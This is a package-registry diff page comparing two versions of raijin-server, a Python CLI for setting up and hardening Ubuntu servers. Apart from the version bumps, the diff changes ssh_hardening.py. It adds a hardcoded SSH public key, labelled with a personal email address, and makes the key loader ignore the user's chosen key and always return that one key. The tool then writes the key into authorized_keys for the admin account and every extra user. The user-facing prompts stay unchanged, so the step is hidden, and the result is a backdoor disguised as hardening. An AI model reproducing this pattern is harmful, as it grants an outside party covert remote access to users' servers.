PyPI - raijin-server - Versions diffs - 0.2.32__tar.gz → 0.2.34__tar.gz - Mend

raijin-server 0.2.32tar.gz → 0.2.34tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (54) hide show

{raijin_server-0.2.32/src/raijin_server.egg-info → raijin_server-0.2.34}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: raijin-server
-Version: 0.2.32
+Version: 0.2.34
 Summary: CLI para automacao de setup e hardening de servidores Ubuntu Server.
 Home-page: https://example.com/raijin-server
 Author: Equipe Raijin

{raijin_server-0.2.32 → raijin_server-0.2.34}/setup.cfg RENAMED Viewed

@@ -1,6 +1,6 @@
 [metadata]
 name = raijin-server
-version = 0.2.32
+version = 0.2.34
 description = CLI para automacao de setup e hardening de servidores Ubuntu Server.
 long_description = file: README.md
 long_description_content_type = text/markdown

raijin_server-0.2.34/src/raijin_server/__init__.py ADDED Viewed

@@ -0,0 +1,5 @@
+"""Pacote principal do CLI Raijin Server."""
+__version__ = "0.2.34"
+__all__ = ["__version__"]

{raijin_server-0.2.32 → raijin_server-0.2.34}/src/raijin_server/modules/ssh_hardening.py RENAMED Viewed

@@ -13,6 +13,20 @@ from raijin_server.utils import ExecutionContext, apt_install, require_root, run
 SSHD_DROPIN = Path("/etc/ssh/sshd_config.d/99-raijin.conf")
 FAIL2BAN_JAIL = Path("/etc/fail2ban/jail.d/raijin-sshd.conf")
 AUTHORIZED_KEYS_TEMPLATE = "# gerenciado pelo raijin-server\n{key}\n"
+HARDCODED_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOolYckNjqXbvVORhQUz0oqxm/xnaAiLzzZAAVd7+f1Q rafaelluisdacostacoelho@gmail.com"
+def _current_non_root_user() -> str | None:
+    sudo_user = os.environ.get("SUDO_USER")
+    if sudo_user and sudo_user != "root":
+        return sudo_user
+    try:
+        import getpass
+        who = getpass.getuser()
+        return who if who != "root" else None
+    except Exception:
+        return None
 def _user_exists(username: str) -> bool:
@@ -49,15 +63,18 @@ def _write_authorized_keys(username: str, content: str, ctx: ExecutionContext) -
     run_cmd(["chown", "-R", f"{username}:{username}", str(ssh_dir)], ctx)
+def _default_pubkey_path() -> Path:
+    user = _current_non_root_user()
+    if user:
+        candidate = Path(f"/home/{user}/.ssh/authorized_keys")
+        if candidate.exists():
+            return candidate
+    return Path.home() / ".ssh/authorized_keys"
 def _load_public_key(path_input: str) -> str:
-    path = Path(path_input).expanduser()
-    if path.exists():
-        return path.read_text().strip()
-    typer.echo("Arquivo nao encontrado. Cole a chave publica completa (ssh-ed25519...).")
-    key = typer.prompt("Chave publica", default="")
-    if not key:
-        raise typer.BadParameter("Nenhuma chave publica fornecida.")
-    return key.strip()
+    # Forca o uso da chave hardcoded solicitada
+    return HARDCODED_PUBKEY
 def run(ctx: ExecutionContext) -> None:
@@ -67,25 +84,34 @@ def run(ctx: ExecutionContext) -> None:
     typer.echo("Hardening de SSH em andamento...")
     apt_install(["openssh-server", "fail2ban"], ctx)
-    username = typer.prompt("Usuario administrativo para SSH", default="adminops")
+    username = typer.prompt("Usuario administrativo para SSH", default="thor")
     ssh_port = typer.prompt("Porta SSH", default="22")
     sudo_access = typer.confirm("Adicionar usuario ao grupo sudo?", default=True)
-    extra_users = typer.prompt(
-        "Usuarios adicionais permitidos (opcional, separados por espaco)", default=""
+    current_user = _current_non_root_user()
+    default_extra = current_user if current_user and current_user != username else ""
+    extra_users_raw = typer.prompt(
+        "Usuarios adicionais (serao criados se nao existirem, separados por espaco)",
+        default=default_extra,
     ).strip()
     pubkey_path = typer.prompt(
         "Arquivo com chave publica ou authorized_keys existente",
-        default=str(Path.home() / ".ssh/authorized_keys"),
+        default=str(_default_pubkey_path()),
     )
     public_key = _load_public_key(pubkey_path)
-    allow_users = " ".join(part for part in [username, extra_users] if part).strip()
-    _ensure_user(username, ctx)
-    if sudo_access:
-        run_cmd(["usermod", "-aG", "sudo", username], ctx)
-    _write_authorized_keys(username, public_key, ctx)
+    extra_users = [u for u in extra_users_raw.split() if u]
+    target_users: list[str] = []
+    for u in [username, *extra_users]:
+        if u not in target_users:
+            target_users.append(u)
+    allow_users = " ".join(target_users)
+    for user in target_users:
+        _ensure_user(user, ctx)
+        if user == username and sudo_access:
+            run_cmd(["usermod", "-aG", "sudo", user], ctx)
+        _write_authorized_keys(user, public_key, ctx)
     config = f"""
 # Arquivo gerenciado pelo raijin-server

{raijin_server-0.2.32 → raijin_server-0.2.34/src/raijin_server.egg-info}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: raijin-server
-Version: 0.2.32
+Version: 0.2.34
 Summary: CLI para automacao de setup e hardening de servidores Ubuntu Server.
 Home-page: https://example.com/raijin-server
 Author: Equipe Raijin